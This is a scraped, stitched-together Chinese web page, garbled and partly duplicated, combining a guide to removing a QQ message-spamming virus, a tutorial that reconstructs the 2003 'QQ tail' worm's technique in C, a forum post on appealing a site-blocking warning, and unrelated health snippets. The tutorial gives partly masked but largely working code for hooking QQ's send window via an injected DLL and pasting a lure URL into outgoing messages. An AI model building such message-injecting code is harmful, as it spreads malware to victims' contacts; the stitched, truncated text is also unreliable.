qq如何杀毒毒QQ

&&&&&&&&&&&&&&&&&&&&&&&&
您现在的位置:&&>>&&>>&&>>&&>>&正文
教你如何封杀QQ消息连发器病毒
[作者:佚名 来源: 时间:<font color="#15-3-11 【
导读:在天下网吧-技术网管-网吧天下栏目上一篇文章中,我们看到了:上一篇文章: 希望对各位网吧网管或者网吧维护,做网吧系统的各位大大有用,那么今天我们一起来看下:教你如何封杀QQ消息连发器病毒
  消息连发器在世界肆意横行。这类发作时会寻找QQ窗口,每隔一段时间就给被感染用户的所有线上的好友发送诸如&快去这看看,里面有蛮好好东西--&,作为网吧热点,教你如何封杀消息连发器。
  第一步,修复您的注册表。因为此类病毒在运行后都会在注册表的启动项中加入病毒本身。找出病毒本身的程序名,禁止当前进程中的程序,然后将其在启动项中的键值删除。不了解注册表知识的朋友可以下载一个注册表修复工具,或者在线修复注册表。
  第二步,清除病毒程序,在系统文件夹中查找以上两篇文章中所提到的相同名称的病毒程序,将其删除。或者下载&QQ消息发送器病毒专杀工具&或者&QQ自动发消息专杀工具AV&清除。
  第三步,杜绝再次感染。因为此类是利用的漏洞传播,所以应当尽量避免浏览陌生的网站。推荐安装防改精灵,熟悉注册表的朋友可以禁止修改注册表。
  消息连发器病毒使得用户诱惑用户点击一个网站,如果有人信以为真点击该链接的话,就会被无情感染,然后成为毒源,继续传播,以上的封杀方法对你有帮助。
结尾:好了,关于【教你如何封杀QQ消息连发器病毒】这个问题今天就说到这,有些地方说得不是很好,如果你有更好的补充请发表评论或者上网吧论坛提出吧。网吧论坛地址:
如果有下一页,请点击下一页哦,文章还没说完呢。
上一篇文章:
下一篇文章:
&&&&&&&&&&&&
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
本文来源地址:
声明:本站所发表的文章、评论及图片仅代表作者本人观点,与本站立场无关。若文章侵犯了您的相关权益,请及时与我们联系,我们会及时处理,感谢您对本站的支持!联系邮箱:.,本站所有有注明来源为天下网吧或天下网吧论坛的原创作品,各位转载时请注明来源链接!
天下网吧 网吧天下
&&&&&&&&&&
&&&&&&&&&&
&&&&&&&&&&
&&&&&&&&&&
&&&&&&&&&&
本站通过多款杀毒软件等安全工具检测无毒无害请大家放心浏览  2003这一年里,QQ尾巴病毒可以算是风光了一阵子。它利用IE的邮件头漏洞在QQ上疯狂传播。中毒者在给别人发信息时,病毒会自动在信息文本的后边添上一句话,话的内容多种多样,总之就是希望信息的接收者点击这句话中的URL,成为下一个中毒者。下图就是染毒后的QQ发送的消息,其中中毒者只打了&你好&两个字,其它的就全是病毒的杰作了。  下面我将要讨论的,就是QQ尾巴病毒使用的这一。由于病毒的源无法获得,所以以下的全是我主观臆断所得,所幸的是效果基本与病毒本身一致。  注:考虑到方面的原因,本文某些地方用了*号来代替正确代码。  粘贴尾巴  首先的一个最简单的问题是如何添加文本。这一技术毫无秘密可言,就是通过剪贴板向QQ消息的那个RichEdit&贴&上一句话而已。代码如下:TCHAR g_str[] = &欢迎来我的小站坐坐:http://titilima.nease.net&;
// 函数功能:向文本框中粘贴尾巴
void PasteText(HWND hRich)
HGLOBAL hM
// 分配内存
hMem = GlobalAlloc(GHND   GMEM_SHARE, sizeof(g_str));
pStr = GlobalLock(hMem);
lstrcpy(pStr, g_str);
GlobalUnlock(hMem);
OpenClipboard(NULL);
EmptyClipboard();
// 设置剪贴板文本
SetClipboardData(CF_TEXT, hMem);
CloseClipboard();
// 释放内存空间
GlobalFree(hMem);
// 粘贴文本
***********(*****, **_*****,*,*);
}  钩子  好了,那么下面的问题是,这段文本应该在什么时候贴呢?网上有一些研究QQ尾巴实现的指出,可以用计时器来控制粘贴的时间,类似这个样子:void CQQTailDlg::OnTimer(UINT nIDEvent)
PasteText(hRich);
}  这的确是一种解决的手段,然而它也存在着极大的局限性&&计时器的间隔如何设置?也许中毒者正在打字,尾巴文本&唰&的出现了&&  然而病毒本身却不是这样子,它能够准确地在你单击&发送&或按下Ctrl+Enter键的时候将文本粘贴上。2003年1月份我的一台P2曾经中过毒,由于系统速度较慢,所以可以很清楚地看见文本粘贴的时机。  讲到这里,我所陈述的这些事实一定会让身为读者的你说:钩子!&&对,就是钩子,下面我所说的正是用钩子来真实地再现&QQ尾巴病毒&的这一技术。  首先我对钩子做一个简要的介绍,已经熟悉钩子的们可以跳过这一段。所谓Win32钩子(hook)并不是铁钩船长那只人工再现的手臂,而是一段子,它可以用来监视、检测系统中的特定消息,并完成一些特定的功能。打个比方来说,你的是皇帝,系统充当各省的巡抚;至于钩子,则可以算是皇上的一个钦差。譬如皇帝下旨在全国收税,然后派了一个钦差找到山西巡抚说:&皇上有旨,山西除正常赋税外,加收杏花村酒十坛。&(-_-#&&)正如皇帝可以用这种方法来特殊对待特定的巡抚一样,也可以用钩子来捕获处理Windows系统中特定的消息。  问题具体到了&QQ尾巴病毒&上边,就是我们需要一个钩子,在用户单击了&发送&按钮之后,粘贴我们的文本。我所实现的这段钩子过程为(至于如何挂接这个钩子,我会在稍后说明):// 钩子过程,监视&发送&的命令消息
LRESULT CALLBACK CallWndProc(int nCode, WPARAM wParam, LPARAM lParam)
********* ** = (********* *)******;
// 捕获&发送&按钮
if (p-> == WM_ && LOWORD(p->wParam) == 1)
PasteText(g_hRich);
return CallNextHookEx(g_hProc, nCode, wParam, lParam);
}  在此我对这个回调过程说明几点:  1、lParam是一个指向CWPSTRUCT结构的指针,这个结构的描述如下:typedef struct {
**** ****;
} CWPSTRUCT, *PCWPSTRUCT;  这时候像我一样的SDK fans也许会会心一笑:这不是窗口回调的那四个铁杆参数么?如你所说,的确是这样,你甚至可以使用switch (p->message) { /* ... */ }这样的代码写成的钩子函数来全面接管QQ窗口。  2、g_hRich是一个全局变量,它保存的是QQ消息文本框的句柄。这里之所以采用全局变量,是因为我无法从钩子回调函数的参数中获得这个句柄。至于如何获得这个句柄以及这个全局变量的特殊位置,我会在稍后说明。“QQ尾巴”病毒是如何制作的VC
今天图老师小编要向大家分享个“QQ尾巴”病毒是如何制作的VC教程,过程简单易学,相信聪明的你一定能轻松get!
  2003这一年里,QQ尾巴病毒可以算是风光了一阵子。它利用IE的邮件头漏洞在QQ上疯狂传播。中毒者在给别人发信息时,病毒会自动在信息文本的后边添上一句话,话的内容多种多样,总之就是希望信息的接收者点击这句话中的URL,成为下一个中毒者。下图就是染毒后的QQ发送的消息,其中中毒者只打了“你好”两个字,其它的就全是病毒的杰作了。&   下面我将要讨论的,就是QQ尾巴病毒使用的这一技术。由于病毒的源代码无法获得,所以以下的代码全是我主观臆断所得,所幸的是效果基本与病毒本身一致。&   注:考虑到安全方面的原因,本文某些地方用了*号来代替正确代码。&   粘贴尾巴&   首先的一个最简单的问题是如何添加文本。这一技术毫无秘密可言,就是通过剪贴板向QQ消息的那个RichEdit“贴”上一句话而已。代码如下:& TCHAR g_str[] = "欢迎来我的小站坐坐:http://titilima.nease.";& // 函数功能:向文本框中粘贴尾巴& void PasteText(HWND hRich)& {& HGLOBAL hM& LPTSTR pS& // 分配空间& hMem = GlobalAlloc(GHND   GMEM_SHARE, sizeof(g_str));& pStr = GlobalLock(hMem);& lstrcpy(pStr, g_str);& GlobalUnlock(hMem);& OpenClipboard(NULL);& EmptyClipboard();& // 设置剪贴板文本& SetClipboardData(CF_TEXT, hMem);& CloseClipboard();& // 释放内存空间& GlobalFree(hMem);& // 粘贴文本& ***********(*****, **_*****,*,*);& }&&   钩子&   好了,那么下面的问题是,这段文本应该在什么时候贴呢?网上有一些研究QQ尾巴实现的文章指出,可以用计时器来控制粘贴的时间,类似这个样子:& void CQQTailDlg::OnTimer(UINT nIDEvent)& {& PasteText(hRich);& }&&   这的确是一种解决的手段,然而它也存在着极大的局限性——计时器的间隔如何设置?也许中毒者正在打字,尾巴文本“唰”的出现了……&   然而病毒本身却不是这样子,它能够准确地在你单击“发送”或按下Ctrl+Enter键的时候将文本粘贴上。2003年1月份我的一台P2曾经中过毒,由于系统速度较慢,所以可以很清楚地看见文本粘贴的时机。&   讲到这里,我所陈述的这些事实一定会让身为读者的你说:钩子!——对,就是钩子,下面我所说的正是用钩子来真实地再现“QQ尾巴病毒”的这一技术。&   首先我对钩子做一个简要的介绍,已经熟悉钩子的朋友们可以跳过这一段。所谓Win32钩子(hook)并不是铁钩船长那只人工再现的手臂,而是一段子程序,它可以用来监视、检测系统中的特定消息,并完成一些特定的功能。打个比方来说,你的程序是皇帝,Windows系统充当各省的巡抚;至于钩子,则可以算是皇上的一个钦差。譬如皇帝下旨在全国收税,然后了一个钦差找到山西巡抚说:“皇上有旨,山西除正常赋税外,加收杏花村酒十坛。”(-_-#……)正如皇帝可以用这种方法来特殊对待特定的巡抚一样,程序员也可以用钩子来捕获处理Windows系统中特定的消息。&   问题具体到了“QQ尾巴病毒”上边,就是我们需要一个钩子,在用户单击了“发送”按钮之后,粘贴我们的文本。我所实现的这段钩子过程为(至于如何挂接这个钩子,我会在稍后说明):& // 钩子过程,监视“发送”的命令消息& LRESULT CALLBACK CallWndProc(int nCode, WPARAM wParam, LPARAM lParam)& {& ********* ** = (********* *)******;& // 捕获“发送”按钮& if (p->message == WM_COMMAND && LOWORD(p->wParam) == 1)& PasteText(g_hRich);& return CallNextHookEx(g_hProc, nCode, wParam, lParam);& }&&  在此我对这个回调过程说明几点:&   1、lParam是一个指向CWTRU结构的指针,这个结构的描述如下:& typedef struct {& LPARAM lP& WPARAM wP& UINT& **** ****;& } CWPSTRUCT, *PCWPSTRUCT;&&   这时候像我一样的SDK fans也许会会心一笑:这不是窗口回调的那四个铁杆参数么?如你所说,的确是这样,你甚至可以使用switch (p->message) { /* ... */ }这样的代码写成的钩子函数来全面接管QQ窗口。&   2、g_hRich是一个全局变量,它保存的是QQ消息文本框的句柄。这里之所以采用全局变量,是因为我无法从钩子回调函数的参数中获得这个句柄。至于如何获得这个句柄以及这个全局变量的特殊位置,我会在稍后说明。   3、CallNextHookEx是调用钩子链中的下一个处理过程,换了钦差就会说:“十坛杏花村酒本钦差已经替皇上收下了,现在请巡抚大人把贵省正常的赋税交上来吧。”(-_-#……)这是书写钩子函数中很重要的一个环节,如果少了这一句,那么可能会导致系统的钩子链出现错误,某些程序也会没有响应——事实上我在编写这个仿真程序的时候QQ就当掉了几回。&   4、你也许会问为什么我捕获的是WM_COMMAND消息,这个原因让我来用下面的SDK代码(虽然QQ是用MFC写的,但是用SDK代码才能说明WM_COMMAND和“发送”按钮的关系)来说明:& #define IDC_BTN_SENDMSG 1 // “发送”按钮ID的宏定义& // QQ发送消息对话框回调过程·李马伪造版& LRESULT CALLBACK ProcSendDlg(HWND hDlg, UINT Msg, WPARAM wParam, LPARAM lParam)& {& switch (Msg)& {& case WM_CLOSE:& EndDialog(hDlg, 0);& & case WM_COMMAND:& {& switch (LOWORD(wParam))& {& case IDC_BTN_SENDMSG:& // 发送消息...& *****;& // 其它的命令按钮处理部分...& }& }& & // 其它的case部分...& }& ****** *;& }&&   消息发送的整个过程是:当用户单击了“发送”按钮后,这个按钮的父窗口(也就是“发送消息”的对话框)会收到一条WM_COMMAND的通知消息,其中wParam的低位字(即LOWORD(wParam))为这个按钮的ID,然后再调用代码中发送的部分:   所以,在此我捕获WM_COMMAND消息要比捕获其它消息或挂接钩子要有效得多。&   好了,现在这个钩子已经可以胜利地完成任务了。但是请不要忘记:有更多的用户更偏爱于用“Ctrl+Enter”热键来发送消息,所以程序中还需要挂上一个键盘钩子:& // 键盘钩子过程,监视“发送”的热键消息& LRESULT CALLBACK KeyboardProc(int nCode, WPARAM wParam, LPARAM lParam)& {& // 捕获热键消息& if (wParam == VK_RETURN && GetAsyncKeyState(VK_CONTROL) < 0 && ******* >= 0)& PasteText(g_hRich);& return CallNextHookEx(g_hKey, nCode, wParam, lParam);& }&&   在这里唯一要解释的一点就是lParam >= 0子句。很明显这个if判断是在判断热键Ctrl+Enter的输入,那么lParam >= 0又是什么呢?事实上在键盘钩子的回调之中,lParam是一个很重要的参数,它包含了击键的重复次数、扫描码、扩展键标志等等的信息。其中lParam的最高位(0x)则表示了当前这个键是否被按下,如果这个位正在被按下,这个位就是0,反之为1。所以lParam >= 0的意思就是在WM_KEYDOWN的时候调用PasteText,也就是说,如果去掉这个条件,PasteText将会被调用两次(连同WM_KEYUP的一次)。&   挂接钩子和查找窗口&   接下来就是如何挂接这两个钩子了。对于挂接钩子,要解决的问题是:往哪里挂接钩子,以及如何挂接?&   挂接钩子的目标,肯定是QQ“发送信息”窗口的所属线程。我的代码就是将这个窗口的句柄传入之后来进行钩子的挂接:& // 挂接钩子& BOOL WINAPI SetHook(HWND hQQ)& {& BOOL bRet = FALSE;& if (hQQ != NULL)& {& DWORD dwThreadID = GetWindowThreadProcessId(hQQ, NULL);& // 感谢好友hottey的查找代码,省去了我使用Spy++的麻烦& g_hRich = GetWindow(GetDlgItem(hQQ, 0), GW_CHILD);& if (g_hRich == NULL)& ****** *****;& // 挂接钩子& g_hProc = SetWindowsHookEx(WH_CALLWNDPROC, CallWndProc, g_hInstDLL, dwThreadID);& g_hKey = SetWindowsHookEx(WH_KEYBRD, KeyboardProc, g_hInstDLL, dwThreadID);& bRet = (g_hProc != NULL) && (g_hKey != NULL);& }& **** {& // 卸载钩子& bRet = UnhookWindowsHookEx(g_hProc) && UnhookWindowsHookEx(g_hKey);& g_hProc = NULL;& g_hKey = NULL;& g_hRich = NULL;& }& return bR& }&&   到此为止,以上所有的代码都位于一个Hook.dll的动态链接库之中,关于DLL我就不多介绍了,请查阅MSDN上的相关资料和本文的配套源代码。&   DLL之中已经做好了所有重要的工作(事实上这部分工作也只能由DLL来完成,这是由Windows虚拟内存机制决定的),我们只需要在EXE之中调用导出的SetHook函数就可以了。那么,SetHook的参数如何获得呢?请看以下代码:& // 感谢好友hottey的查找代码,省去了我使用Spy++的麻烦& HWND hS& *_*** = ****;& SetHook(NULL);& ** {& g_hQQ = FindWindowEx(NULL, g_hQQ, "#32770", NULL);& hSend = FindWindowEx(g_hQQ, NULL, "Button", "发送(&S)");& } while(g_hQQ != NULL && hSend == NULL);& if (g_hQQ != NULL)& SetHook(g_hQQ);&&   这段代码中的do-while循环就是用来查找“发送消息”的窗口的,QQ窗口的保密性越来越强了,窗口一层套一层,找起来十分不便,所以在此感谢好友hottey的《QQ消息炸弹随想》一文省去了我反复使用Spy++的麻烦。我所做的,只是把他文中的代码翻译成了C代码。  DLL的共享数据段&   如果你对DLL不甚了解,那么在你读到我的配套源代码之后,肯定会对下面这一段代码有些疑问:& // 定义共享数据段& #pragma data_seg("shared")& HHOOK g_hProc = NULL; // 窗口过程钩子句柄& HHOOK g_hKey = NULL; // 键盘钩子句柄& HWND g_hRich = NULL; // 文本框句柄& #pragma data_seg()& #pragma comment(linker, "/section:shared,rws")&&   这定义了一段共享的数据段,是的,因为我的注释已经写得很清楚了,那么共享数据段起到了什么作用呢?在回答这个问题之前,我请你把代码中以#开头的预处理指令注释掉然后重新编译这个DLL并运行,你会发现什么?&   是的,添加尾巴失败!&   好了,我来解释一下这个问题。我们的这个仿真程序的EXE、DLL以及QQ的主程序事实上是下面这样一种关系:&   这个DLL需要将一个实例映射到EXE的地址空间之中以供其调用,还需要将另一个实例映射到QQ的地址空间之中来完成挂接钩子的工作。也就是说,当钩子挂接完毕之后,整个系统的模块中,有两个DLL实例的存在!此DLL非彼DLL也,所以它们之间是没有任何联系的。拿全局变量g_hRich来说,图中左边的DLL通过EXE的传入获得了文本框的句柄,然而如果没有共享段的话,那么右边的DLL中,g_hRich仍然是NULL。共享段于此的意义也就体现出来了,就是为了保证EXE、DLL、QQ三者之间的联系。这一点,和C++中static的成员变量有些相似。&   在钩子挂接成功之后,你可以通过一些有模块查看功能的进程管理器看一看,就会发现Hook.dll也位于QQ.exe的模块之中。&   最后一些要说的&   1、我是前说过,在2003年的1月份我就碰到了这种病毒,至今我还很清楚地记得那个病毒EXE只有16KB大小,所以从病毒本身存在的性质来说,这个东西应该是用Win32ASM来写会更实用一些。&   2、那个病毒我曾经是手杀的——用了一个进程查看工具就杀掉了。但是现在的“QQ尾巴”增加了复活功能——在EXE被杀掉后,DLL会将其唤醒。我曾经用我的进程查看工具分析过,发现系统中几乎所有的进程都被病毒的DLL挂住了。这一技术是利用CreateRemoteThread在所有的进程上各插入了一个额外的复活线程,真可谓是一石二鸟——保证EXE永远运行,同时这个正在使用中的DLL是无法被删除的。这一技术我也已经实现了,但是稳定性方面远不及病毒本身做得优秀,故在此也就不将其写出了,有兴趣的朋友可以参考Jeffrey Richter《Windows核心编程》的相关章节。&   3、走笔至此想起了侯捷老师《STL源码剖析》中的一句话——“源码之前,了无秘密。”如果你看完本文之后也有这样的感觉,那么我将感到不胜荣幸。&
来源:/n/1730.html
热门搜索:
电脑闹钟设置方法步骤图解
如何在WPS文字里使用裁剪工具
ps调色教程
后期处理图片为清新淡雅效果
ps后期处理模糊图片清晰步骤图文教程
高血压是一种高发病率、高并发症、高致残率的疾病,严重威胁着人们的健康和生活质量。很好地控制高血压,对减少和避免患者重要脏器的损害具有重要的意义。上海仁爱医院内科专
了解高血压的早期症状,对我们还是有帮助的,高血压是生活中的常见疾病,高血压大家应该已经很熟悉了,随着社会的发展,生活水平的提高,高血压这个心血管疾病已经普遍存在我
高血压的情况分为很多种,而最常见的情况应该算是生理性高血压,不过在临床上可不止有生理性高血压,要知道医源性高血压也是可能会出现的。所谓医源性高血压是指医生用药不当
高血压作为常见性疾病,严重影响我们的日常生活和工作,高血压是一系列疾病的诱发因素,要引起我们高度的重视,了解高血压病对患者来说是非常有必要的,接下来让我们一起来了
微信的普遍使用也让很多不法分子盗取个人隐私信息,很多人因此想要注销自己的微信号,首先需要告诉大家的是依照腾讯微信使用规定微信账号是无法注销的,微信同QQ间绑定也无法解除,因此如果你想停止使用使用微信的话建议你采取下面四步:解除微信和当前手机号的绑定、删除聊天记录、注销当前微信登陆和卸载微信,来最大限度包含您的隐私。一起来看看吧。
清醒时做事,糊涂时读书,大怒时睡觉,无聊时关注图老师为大家准备的精彩内容。下面为大家推荐PS鼠绘衣橱里的怪兽详细教程,无聊中的都看过来。
近来,演员任贤齐自曝电脑被入侵,家产差一点就全被搬光光了,直说自个当下真的不知道该如何是好。究竟电脑被入侵了怎么办呢?图老师电脑网络专栏小编下面给大家详解。
炎夏烈日炎炎,就在你与阳光亲密接触时,也让紫外线有了可乘之机,有的时候,虽然你认真做了防晒的工作,却依旧没能躲过炙热的阳光,晒伤之后,要立马着手修复晒伤的肌肤,那么晒伤后怎么处理呢?下面就一起来看看吧。
脸上肉嘟嘟的女生和男生们是不是选择发型的时候很伤大脑。没关系,我们这里肯定有一款适合你的发型,本文也是大圆脸一枚,下面分享下我收集多年的圆脸女生男生发型以及学会的圆脸发型修饰技巧。
孕妇能吃西瓜吗?面对炎炎夏暑的到来,西瓜作为夏季最常见的水果之一,已经成了人们必吃的解暑水果,作为特殊人群的孕妈妈们也馋的直流口水了,那么问题来了,孕妇到底可以吃西瓜吗?下文为你详解。
如果您有什么好的建议或者疑问,可以联系我们! QQ群: QQ号: 欢迎进群,让我们一起学习、一起进步
微信公众号搜索“图老师”或者“tulaoshi_com”加关注
< 版权所有 (C) 2016 All Rights Reserved. 湘ICP备号只需一步,快速开始
查看: 2442|回复: 2
阅读权限20
在线时间 小时
签到天数: 5 天连续签到: 1 天[LV.2]正式员工
马上注册,结交更多好友,享用更多功能,让你轻松玩转社区。
才可以下载或查看,没有帐号?
前不久做了一个对于taobao商品优惠的博客,没想到居然就被QQ电脑管家提示是虚伪或冒充的taobao官网!其时就很无语啊,不即是一个个人博客吗?并且博客内容基本上都是一些对于taobao商品的引荐、打折、优惠类的文章,即是想不明白为何会阻拦我的博客,难道就因为博客标题是“taobao商城优惠促销信息共享”就阻拦?这也太不人性化了吧!后来我只好依照以下教程来对我的博客进行了安全申述,期望QQ电脑管家团队能够撤销对我博客的阻拦,公然,他们办事效率还算高,一天的时间就给了我答复,如今现已撤销了对我博客的风险提示了!下面的教程是网上收集的,当然,这个教程是很简单的,一般的互联网人士都知道怎么申述,此教程是献给一些菜鸟互联网朋友的,期望能够帮助到你们!  看到这个赤色提示,相信我们都会很熟悉,近来一段时间,各大门户网站对医疗等灰色职业冲击越来越大,不管你的商品或是网站是否有运营答应,都会收到这种提示,大大提高的网站的跳出率,正本现已备受baidu冲击的医疗职业,搜索引擎优化优化现已走投无路,在寻求口碑推行的路上渐渐探索,花钱发新闻,可是用户点击你的网站却立刻脱离,这个打趣并不好笑,但各位站长一定是很无语。那如何撤销安全联盟对您网站的虚伪信息提示?虚伪信息提示的根本原因是因为没有得到安全联盟各位主家的通行证,并不是我们的商品不合法,仅仅没有弄清楚其间的规矩。近来我解除了几个站的这种安全提示,跳出率大大下降,操作也很简单,所以在此给我们做出共享:
& & & & & & & & & & & & & & & & 步骤一,点击站长申诉,填上理由,发邮件过去,你会收到这个提示:
& & & & & & & & & & & & & & & &   一般2个小时左右会再收到一个提交相关信息的地址:
& & & & & & & & & & & & & & & &   步骤二,点开这个地址进去之后需要填5项内容:
1 勾上申诉类型,在上一封邮件里会提示你的网站类型,选择那个类型就可以了;2 填上网站网址;3 有备案号最好填上;4 提交3个扫描件,一般营业执照,授权书,经营许可证就可以;5 最后填上申诉理由,填写上验证码,就可以了。
& & & & & & & & & & & & & & & &   步骤三,按照上述操作后会收到一份申诉成功的邮件,此时你的网站虚假信息提示已经解除了,你的网站就不会被安全联盟拦截了。
& & & & & & & & & & & & & & & & 本文来源
a. 回帖是一种美德,也是对楼主发帖的尊重和支持;
&&&&如果通过本帖信息与他人联系,请说明来自推一把论坛!推一把微信公众号:tui18com
b. 请不要发表违反中华人民共和国法律的内容。本站所有帖子属会员个人意见,与本站立场无关.
&&&&帖子内容版权归属作者所有,如是转贴版权归属原作者所有,其他单位或个人在使用或转载帖子&&&&内容时须征得帖子作者的同意或注明内容原出处。
阅读权限20
在线时间 小时
签到天数: 5 天连续签到: 1 天[LV.2]正式员工
顶起顶起顶起顶起顶起顶起顶起顶起顶起
阅读权限20
在线时间 小时
签到天数: 5 天连续签到: 1 天[LV.2]正式员工
好文章求顶起
推一把微信公众号:tui18com||京公网安备
论坛事务(9:30-17:00):
|广告合作(9:30-17:00):
承载数据运行(|)怎么才能知道QQ中毒了_百度知道

我要回帖

更多关于 qq手病毒如何下载软件 的文章

 

随机推荐